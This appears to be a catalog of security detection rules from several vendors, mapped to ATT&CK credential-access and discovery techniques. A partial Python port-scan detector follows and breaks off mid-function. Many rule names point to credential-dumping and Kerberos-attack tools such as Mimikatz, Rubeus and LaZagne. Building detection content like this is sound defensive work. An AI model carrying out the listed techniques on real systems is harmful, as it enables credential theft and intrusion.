- Elastic Multiple Vault Web Credentials Read production
- Splunk Non Chrome Process Accessing Chrome Default Dir production
- Splunk Non Firefox Process Access Firefox Profile Dir production
- Splunk Possible Browser Pass View Parameter production
- Sigma Potential Browser Data Stealing test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Veeam Credential Access Command production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto PRT Credential Stealing
- Sigma PUA - WebBrowserPassView Execution test
- YARA-L Recon Credential Theft CISA Report
- Sigma Remote Thread Created In KeePass.EXE test
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma SQLite Chromium Profile Data DB Access test
- Splunk Stored Credentials from Web Browsers - Windows (PowerShell)
- Sigma Suspicious Key Manager Access test
- Sigma Suspicious Serv-U Process Pattern test
- Sigma User application credentials dump via network share (DonPapi, Lazagne) experimental
- Sigma User browser credentials dump via network share (DonPapi, Lazagne) experimental
- Sigma User files dump via network share (DonPapi, Lazagne) experimental
- Sigma Vault credentials manager accessed experimental
- Sigma Vault credentials manager accessed experimental
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Windows Credential Manager Access via VaultCmd test
- Splunk Windows Credentials Access via VaultCli Module production
- Splunk Windows Credentials from Password Stores Chrome Copied in TEMP Dir production
- Splunk Windows Credentials from Password Stores Creation production
- Splunk Windows Credentials from Password Stores Deletion production
- Splunk Windows Credentials from Password Stores Query production
- Splunk Windows Credentials from Web Browsers Saved in TEMP Folder production
- Splunk Windows Password Managers Discovery production
- Elastic Wireless Credential Dumping using Netsh Command production
Credentials from Password Stores: Credentials from Web Browsers T1555.003 17 rules
- Sigma Access To Browser Credential Files By Uncommon Applications - Security test
- Sigma Access to Browser Login Data test
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Non Chrome Process Accessing Chrome Default Dir production
- Splunk Non Firefox Process Access Firefox Profile Dir production
- Splunk Possible Browser Pass View Parameter production
- Sigma Potential Browser Data Stealing test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - WebBrowserPassView Execution test
- Sigma SQLite Chromium Profile Data DB Access test
- Splunk Stored Credentials from Web Browsers - Windows (PowerShell)
- Sigma User browser credentials dump via network share (DonPapi, Lazagne) experimental
- Splunk Windows Credentials from Password Stores Chrome Copied in TEMP Dir production
- Splunk Windows Credentials from Web Browsers Saved in TEMP Folder production
Credentials from Password Stores: Windows Credential Manager T1555.004 9 rules
- Sigma Credentials (protected by DPAPI) dump via network share experimental
- Elastic Multiple Vault Web Credentials Read production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma Suspicious Key Manager Access test
- Sigma Vault credentials manager accessed experimental
- Sigma Vault credentials manager accessed experimental
- Sigma Windows Credential Manager Access via VaultCmd test
- Splunk Windows Credentials Access via VaultCli Module production
Credentials from Password Stores: Password Managers T1555.005 2 rules
- Sigma Remote Thread Created In KeePass.EXE test
- Splunk Windows Password Managers Discovery production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Adversary-in-the-Middle T1557 37 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Elastic Creation or Modification of Root Certificate production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Elastic DNS Global Query Block List Modified or Disabled production
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma ISATAP Router Address Was Set experimental
- Sigma Local Privilege Escalation Indicator TabTip test
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Kusto NTLM Relay Attack
- Elastic Potential ADIDNS Poisoning via Wildcard Record Creation production
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Potential WPAD Spoofing via DNS Record Creation production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Elastic Service Creation via Local Kerberos Authentication production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: Name Resolution Poisoning and SMB Relay T1557.001 25 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma Local Privilege Escalation Indicator TabTip test
- Kusto NTLM Relay Attack
- Elastic Potential Computer Account NTLM Relay Activity production
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: DHCP Spoofing T1557.003 1 rule
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
Steal or Forge Kerberos Tickets T1558 67 rules
- Sigma Administrator login impersonation with forged Golden ticket stable
- Splunk Disabled Kerberos Pre-Authentication Discovery With Get-ADUser production
- Splunk Disabled Kerberos Pre-Authentication Discovery With PowerView production
- Sigma HackTool - KrbRelay Execution test
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Mimikatz Kirbi File Creation test
- Sigma HackTool - RemoteKrbRelay Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Kerberoasting Activity - Initial Query test
- Splunk Kerberoasting spn request with RC4 encryption production
- Sigma Kerberos AS-REP Roasting ticket request detected experimental
- Sigma Kerberos key list attack for credential dumping experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Splunk Kerberos Pre-Authentication Flag Disabled in UserAccountControl production
- Splunk Kerberos Pre-Authentication Flag Disabled with PowerShell production
- Splunk Kerberos Service Ticket Request Using RC4 Encryption production
- Sigma Kerberos TGS ticket request related to a potential Golden ticket experimental
- Sigma Kerberos ticket without a trailing $ (CVE-2021-42278/42287) experimental
- Elastic Kerberos Traffic from Unusual Process production
- Elastic Kirbi File Creation production
- Elastic KRBTGT Delegation Backdoor production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma No Suitable Encryption Key Found For Generating Kerberos Ticket test
- Sigma Potential CVE-2021-42278 Exploitation Attempt test
- Sigma Potential CVE-2021-42287 Exploitation Attempt test
- Kusto Potential Kerberoasting
- Sigma Potential SPN Enumeration Via Setspn.EXE test
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Register new Logon Process by Rubeus test
- Sigma Replay Attack Detected test
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Sigma Rubeus Kerberos constrained delegation abuse (S4U2Proxy) experimental
- Sigma Rubeus Kerberos unconstrained delegation abuse experimental
- Splunk Rubeus Password Change (Windows Event Log)
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Elastic Service Creation via Local Kerberos Authentication production
- Splunk ServicePrincipalNames Discovery with PowerShell production
- Splunk ServicePrincipalNames Discovery with SetSPN production
- Sigma Shared folder access with forged Golden ticket stable
- Sigma Suspicious Kerberos password account reset to issue potential Golden ticket experimental
- Sigma Suspicious Kerberos proxiable/S4U2self ticket (CVE-2021-42278/42287) experimental
- Sigma Suspicious Kerberos RC4 Ticket Encryption test
- Sigma Suspicious Kerberos Ticket Request via CLI experimental
- Sigma Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Kusto T1558.003 - Kerberoasting
- Sigma Uncommon Outbound Kerberos Connection test
- Sigma Uncommon Outbound Kerberos Connection - Security test
- Kusto UnPAC the hash
- Splunk Unusual Number of Kerberos Service Tickets Requested production
- Elastic User account exposed to Kerberoasting production
- Sigma User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' test
- Splunk Windows Computer Account Created by Computer Account production
- Splunk Windows Computer Account Requesting Kerberos Ticket production
- Splunk Windows Computer Account With SPN production
- Splunk Windows Domain Admin Impersonation Indicator production
- Splunk Windows Kerberos Local Successful Logon production
- Splunk Windows PowerView Kerberos Service Ticket Request production
- Splunk Windows PowerView SPN Discovery production
- Splunk Windows Process With NetExec Command Line Parameters production
- Splunk Windows Steal or Forge Kerberos Tickets Klist production
Steal or Forge Kerberos Tickets: Golden Ticket T1558.001 10 rules
- Sigma Administrator login impersonation with forged Golden ticket stable
- Splunk Kerberos Service Ticket Request Using RC4 Encryption production
- Sigma Kerberos TGS ticket request related to a potential Golden ticket experimental
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Sigma Shared folder access with forged Golden ticket stable
- Sigma Suspicious Kerberos password account reset to issue potential Golden ticket experimental
Steal or Forge Kerberos Tickets: Silver Ticket T1558.002 7 rules
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Kusto UnPAC the hash
Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 32 rules
- Sigma HackTool - KrbRelay Execution test
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - RemoteKrbRelay Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Kerberoasting Activity - Initial Query test
- Splunk Kerberoasting spn request with RC4 encryption production
- Elastic Kerberos Traffic from Unusual Process production
- Sigma No Suitable Encryption Key Found For Generating Kerberos Ticket test
- Sigma Potential CVE-2021-42278 Exploitation Attempt test
- Sigma Potential CVE-2021-42287 Exploitation Attempt test
- Sigma Potential SPN Enumeration Via Setspn.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Register new Logon Process by Rubeus test
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Splunk ServicePrincipalNames Discovery with PowerShell production
- Splunk ServicePrincipalNames Discovery with SetSPN production
- Sigma Suspicious Kerberos RC4 Ticket Encryption test
- Sigma Suspicious Kerberos Ticket Request via CLI experimental
- Sigma Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Kusto T1558.003 - Kerberoasting
- Sigma Uncommon Outbound Kerberos Connection - Security test
- Splunk Unusual Number of Kerberos Service Tickets Requested production
- Elastic User account exposed to Kerberoasting production
- Sigma User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' test
- Splunk Windows PowerView Kerberos Service Ticket Request production
- Splunk Windows PowerView SPN Discovery production
- Splunk Windows Process With NetExec Command Line Parameters production
Steal or Forge Kerberos Tickets: AS-REP Roasting T1558.004 8 rules
- Splunk Disabled Kerberos Pre-Authentication Discovery With Get-ADUser production
- Splunk Disabled Kerberos Pre-Authentication Discovery With PowerView production
- Sigma Kerberos AS-REP Roasting ticket request detected experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Splunk Kerberos Pre-Authentication Flag Disabled in UserAccountControl production
- Splunk Kerberos Pre-Authentication Flag Disabled with PowerShell production
- Splunk Rubeus Command Line Parameters production
- Splunk Windows Process With NetExec Command Line Parameters production
Steal or Forge Authentication Certificates T1649 25 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Splunk Certificate Abuse - Windows (Sysmon)
- Splunk Certificate Abuse - Windows (Windows Event Log)
- Splunk Certificate Enumeration - Windows (Windows Event Log)
- Sigma Certificate Exported From Local Certificate Store test
- Sigma Certificate Private Key Acquired test
- Splunk Certutil exe certificate extraction production
- Splunk Detect Certify Command Line Arguments production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Certipy File Modifications production
- Sigma HackTool - Certify Execution test
- Sigma HackTool - Certipy Execution test
- Splunk Windows Export Certificate production
- Splunk Windows Mimikatz Crypto Export File Extensions production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows Steal Authentication Certificates - ESC1 Abuse production
- Splunk Windows Steal Authentication Certificates - ESC1 Authentication production
- Splunk Windows Steal Authentication Certificates Certificate Issued production
- Splunk Windows Steal Authentication Certificates Certificate Request production
- Splunk Windows Steal Authentication Certificates CertUtil Backup production
- Splunk Windows Steal Authentication Certificates CryptoAPI production
- Splunk Windows Steal Authentication Certificates CS Backup production
- Splunk Windows Steal Authentication Certificates Export Certificate production
- Splunk Windows Steal Authentication Certificates Export PfxCertificate production
Discovery
System Service Discovery T1007 17 rules
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - PCHunter Execution test
- Sigma Net.EXE Execution test
- Sigma Potential Configuration And Service Reconnaissance Via Reg.EXE test
- Sigma Potential Registry Reconnaissance Via PowerShell Script test
- Sigma SC.EXE Query Execution test
- Elastic System Service Discovery through built-in Windows Utilities production
- Splunk Windows Net System Service Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
Application Window Discovery T1010 2 rules
- Kusto Qakbot Discovery Activies available
- Sigma SCM Database Handle Failure test
Query Registry T1012 31 rules
- Sigma Azure AD Health Monitoring Agent Registry Keys Access test
- Sigma Azure AD Health Service Agents Registry Keys Access test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Exports Critical Registry Keys To a File test
- Sigma Exports Registry Key To a File test
- Sigma HackTool - PCHunter Execution test
- Kusto Microsoft Entra ID Local Device Join Information and Transport Key Registry Keys Access available
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential Configuration And Service Reconnaissance Via Reg.EXE test
- Sigma Potential Registry Reconnaissance Via PowerShell Script test
- Splunk Query Registry (PowerShell)
- Splunk Query Registry (Windows Event Log)
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma SAM Registry Hive Handle Request test
- Sigma SysKey Registry Keys Access test
- Splunk Windows Credential Access From Browser Password Store production
- Splunk Windows Credentials from Password Stores Chrome Extension Access production
- Splunk Windows Credentials from Password Stores Chrome LocalState Access production
- Splunk Windows Credentials from Password Stores Chrome Login Data Access production
- Splunk Windows Hosts File Access production
- Splunk Windows Non Discord App Access Discord LevelDB production
- Splunk Windows Product Key Registry Query production
- Splunk Windows Query Registry Browser List Application production
- Splunk Windows Query Registry UnInstall Program List production
- Splunk Windows Registry Entries Exported Via Reg production
- Splunk Windows Registry Entries Restored Via Reg production
- Splunk Windows Software Discovery Via PowerShell production
System Network Configuration Discovery T1016 43 rules
- Elastic Active Directory Discovery using AdExplorer production
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk Domain Controller Enumeration via nltest (PowerShell)
- Splunk Domain Controller Enumeration via nltest (Sysmon)
- Splunk Domain Controller Enumeration via nltest (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic External IP Lookup from Non-Browser Process production
- Sigma Failed DNS server zone transfer for enumeration purposes experimental
- Sigma Firewall Configuration Discovery Via Netsh.EXE test
- Sigma Firewall configuration enumerated (command) experimental
- Sigma Firewall configuration enumerated (PowerShell) experimental
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Splunk Multiple nslookup commands (Sysmon)
- Splunk Multiple nslookup commands (Windows Event Log)
- Splunk Network Discovery Using Route Windows App production
- Sigma Nltest.EXE Execution test
- Splunk Nslookup Execution (Windows Event Log)
- Sigma Potential Pikabot Discovery Activity test
- Sigma Potential Recon Activity Via Nltest.EXE test
- Splunk Potential System Network Configuration Discovery Activity production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- YARA-L Recon Environment Enumeration Network CISA Report
- Elastic Remote System Discovery Commands production
- Sigma Scheduled task enumerated experimental
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Sigma Suspicious Network Command test
- Sigma Suspicious Network Connection to IP Lookup Service APIs test
- Elastic Suspicious PDF Reader Child Process production
- Elastic System Public IP Discovery via DNS Query production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows System Network Config Discovery Display DNS production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Sigma Winlogon process contact to C2 - Blacklotus (Sysmon) experimental
- Elastic Wireless Credential Dumping using Netsh Command production
System Network Configuration Discovery: Internet Connection Discovery T1016.001 5 rules
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic External IP Lookup from Non-Browser Process production
- Splunk Network Discovery Using Route Windows App production
- Elastic Suspicious PDF Reader Child Process production
- Elastic System Public IP Discovery via DNS Query production
Remote System Discovery T1018 66 rules
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Elastic Active Directory Discovery using AdExplorer production
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma Chopper Webshell Process Pattern test
- Sigma DirectorySearcher Powershell Exploitation test
- Sigma DNS hosts file accessed via network share experimental
- Splunk Domain Controller Discovery with Nltest production
- Splunk Domain Controller Discovery with Wmic production
- Splunk Domain Controller Enumeration via nltest (PowerShell)
- Splunk Domain Controller Enumeration via nltest (Sysmon)
- Splunk Domain Controller Enumeration via nltest (Windows Event Log)
- Elastic Enumerating Domain Trusts via DSQUERY.EXE production
- Elastic Enumerating Domain Trusts via NLTEST.EXE production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk FScan.exe Network Scan (Sysmon)
- Splunk FScan.exe Network Scan (Windows Event Log)
- Splunk GetAdComputer with PowerShell production
- Splunk GetAdComputer with PowerShell Script Block production
- Splunk GetDomainComputer with PowerShell production
- Splunk GetDomainComputer with PowerShell Script Block production
- Splunk GetDomainController with PowerShell production
- Splunk GetDomainController with PowerShell Script Block production
- Splunk GetWmiObject Ds Computer with PowerShell production
- Splunk GetWmiObject Ds Computer with PowerShell Script Block production
- Sigma HackTool - NetExec Execution experimental
- Kusto LDAP reconnaissance via search filters
- Splunk Multiple nslookup commands (Sysmon)
- Splunk Multiple nslookup commands (Windows Event Log)
- Sigma Net.EXE Execution test
- Sigma Nltest.EXE Execution test
- Splunk NMAP Execution (EDR)
- Splunk NMAP Execution (PowerShell)
- Splunk NMAP Execution (Windows Event Log)
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk Potential Ping Sweep (Windows Event Log)
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Probable AdFind Recon Tool Usage available
- Kusto Probable AdFind Recon Tool Usage (Normalized Process Events)
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - Adidnsdump Execution test
- Elastic Remote System Discovery Commands production
- Splunk Remote System Discovery with Adsisearcher production
- Splunk Remote System Discovery with Dsquery production
- Splunk Remote System Discovery with Wmic production
- Sigma Renamed AdFind Execution test
- Sigma Share And Session Enumeration Using Net.EXE stable
- Sigma Suspicious Scan Loop Network test
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Splunk Windows AdFind Exe production
- Splunk Windows Get-AdComputer Unconstrained Delegation Discovery production
- Splunk Windows Netspy Network Scanner Execution production
- Elastic Windows Network Enumeration production
- Splunk Windows PowerView Constrained Delegation Discovery production
- Splunk Windows PowerView Unconstrained Delegation Discovery production
- Splunk Windows PsTools Recon Usage production
System Owner/User Discovery T1033 55 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Splunk Check Elevated CMD using whoami production
- Sigma Chopper Webshell Process Pattern test
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Sigma Computer Discovery And Export Via Get-ADComputer Cmdlet test
- Sigma Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell test
- Sigma Enumerate All Information With Whoami.EXE test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Get-ADUser Enumeration Using UserAccountControl Flags test
- Splunk GetCurrent User with PowerShell production
- Splunk GetCurrent User with PowerShell Script Block production
- Sigma Group Membership Reconnaissance Via Whoami.EXE test
- Sigma HackTool - SharpLdapWhoami Execution test
- Sigma HackTool - SharpView Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Local Accounts Discovery test
- YARA-L Local Accounts Discovery
- YARA-L MITRE ATT&CK T1033 Recon Successful Logon Enumeration Powershell CISA Report
- Sigma Potential Dridex Activity stable
- Splunk PowerView_SharpView Commands (PowerShell)
- Sigma Renamed Whoami Execution test
- Sigma Security Privileges Enumeration Via Whoami.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious PowerShell Get Current User test
- Splunk System Owner_User Discovery - Windows (PowerShell)
- Splunk System Owner_User Discovery - Windows (Sysmon)
- Splunk System Owner_User Discovery - Windows (Windows Event Log)
- Splunk System User Discovery With Query production
- Splunk System User Discovery With Whoami production
- Sigma User Discovery And Export Via Get-ADUser Cmdlet test
- Sigma User Discovery And Export Via Get-ADUser Cmdlet - PowerShell test
- Splunk User Discovery via Environment Variables - PowerShell (PowerShell)
- Splunk User Discovery With Env Vars PowerShell production
- Splunk User Discovery With Env Vars PowerShell Script Block production
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma WhoAmI as Parameter test
- YARA-L Whoami Execution
- Elastic Whoami Process Activity production
- Sigma Whoami.EXE Execution Anomaly test
- Sigma Whoami.EXE Execution From Privileged Process test
- Sigma Whoami.EXE Execution With Output Option test
- Elastic Windows Account or Group Discovery production
- Splunk Windows System Discovery Using ldap Nslookup production
- Splunk Windows System Discovery Using Qwinsta production
- Splunk Windows System Remote Discovery With Query production
- Splunk Windows System User Discovery Via Quser production
- Splunk Windows System User Privilege Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
Network Sniffing T1040 9 rules
- Sigma Harvesting Of Wifi Credentials Via Netsh.EXE test
- Sigma New Network Trace Capture Started Via Netsh.EXE test
- Sigma PktMon.EXE Execution test
- Sigma Potential Network Sniffing Activity Using Network Tools test
- Sigma Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Windows native Pktmon sniffer abuse experimental
- Sigma Windows Pcap Drivers test
- Sigma Windows traffic capture abuse experimental
Network Service Discovery T1046 31 rules
- Splunk Advanced IP or Port Scanner Execution production
- Sigma Advanced IP Scanner - File Event test
- Splunk Advanced IP Scanner Execution (Sysmon)
- Splunk Advanced IP Scanner Execution (Windows Event Log)
- Splunk Advanced Port Scanner Execution (Sysmon)
- Splunk Advanced Port Scanner Execution (Windows Event Log)
- Sigma Anonymous access performed to multiple targets experimental
- Splunk FScan.exe Network Scan (Sysmon)
- Splunk FScan.exe Network Scan (Windows Event Log)
- Sigma Grixba Malware Reconnaissance Activity experimental
- Sigma HackTool - winPEAS Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Internal Port Scan - Critical Ports (Windows Event Log)
- Splunk masscan Execution - Windows (PowerShell)
- Splunk masscan Execution - Windows (Sysmon)
- Splunk masscan Execution - Windows (Windows Event Log)
- Sigma Network login performed to multiple targets experimental
- Kusto Network Port Sweep from External Network (ASIM Network Session schema) available
- Kusto Port scan detected (ASIM Network Session schema) available
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - Advanced IP Scanner Execution test
- Sigma PUA - Advanced Port Scanner Execution test
- Sigma PUA - NimScan Execution test
- Sigma PUA - Nmap/Zenmap Execution test
- Sigma PUA - SoftPerfect Netscan Execution test
- Sigma Python Initiated Connection test
- Splunk SoftPerfect Network Scanner Execution (Sysmon)
- Splunk SoftPerfect Network Scanner Execution (Windows Event Log)
- Sigma Suspicious anonymous login (domain specified) experimental
- Splunk Windows PsTools Recon Usage production
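The two Kusto rules in this list, Port scan detected and Network Port Sweep from External Network, both aggregate ASIM Network Session records per source rather than matching a single event. The block below is an added illustration of that aggregation shape, not the catalog's parsed logic for either rule: the thresholds, the one-minute tumbling window, the RFC 1918 definition of "internal" and the sample traffic are all assumptions chosen for the example.

```python
"""Added example: port-scan and port-sweep detection over constructed
network-session records in the shape of the ASIM Network Session rules
above (source, destination, destination port, time). Thresholds, the
tumbling-window scheme and the sample traffic are assumptions, not the
catalog's own rule logic."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class NetSession:
    ts: datetime
    src: str
    dst: str
    dst_port: int


_PRIVATE = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip: str) -> bool:
    """True when the address is outside RFC 1918 space (assumed internal ranges)."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in _PRIVATE)


def _bucket(ts: datetime, window: timedelta) -> int:
    # Tumbling window id. A scan straddling a boundary splits across two ids,
    # which is why production rules often add a sliding-window variant.
    return int(ts.timestamp() // window.total_seconds())


def port_scans(sessions, window=timedelta(minutes=1), min_ports=20):
    """One source touching >= min_ports distinct ports on one destination per window."""
    ports = defaultdict(set)
    for s in sessions:
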